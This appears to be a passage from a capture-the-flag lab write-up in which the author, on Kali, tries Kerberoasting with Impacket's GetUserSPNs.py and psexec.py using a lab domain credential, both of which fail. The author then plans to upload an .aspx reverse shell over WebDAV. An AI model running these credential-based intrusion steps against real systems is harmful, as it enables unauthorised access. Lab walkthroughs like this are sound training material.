â•â”€î‚² ï…¼  ï„• /home/kali/impacket/examples  ï„“  master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali î‚°
╰─ GetUserSPNs.py hutch.offsec/fmcsorley:'CrabSharkJellyfish192' -dc-ip 192.168.105.122 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Tried to look for Kerberoastable accounts but unable to.
â•â”€î‚² ï…¼  ï„• /home/kali/impacket/examples  ï„“  master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali î‚°
╰─ python3 psexec.py hutch.offsec/fmcsorley:'CrabSharkJellyfish192'@192.168.105.122
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 192.168.105.122.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
PSEXEC also went nowhere.
So I remembered that we still have webdav enabled on the web application, so we can possibly go with our credentials to use cadaver and upload a .aspx file since that is what the website uses and get a reverse shell.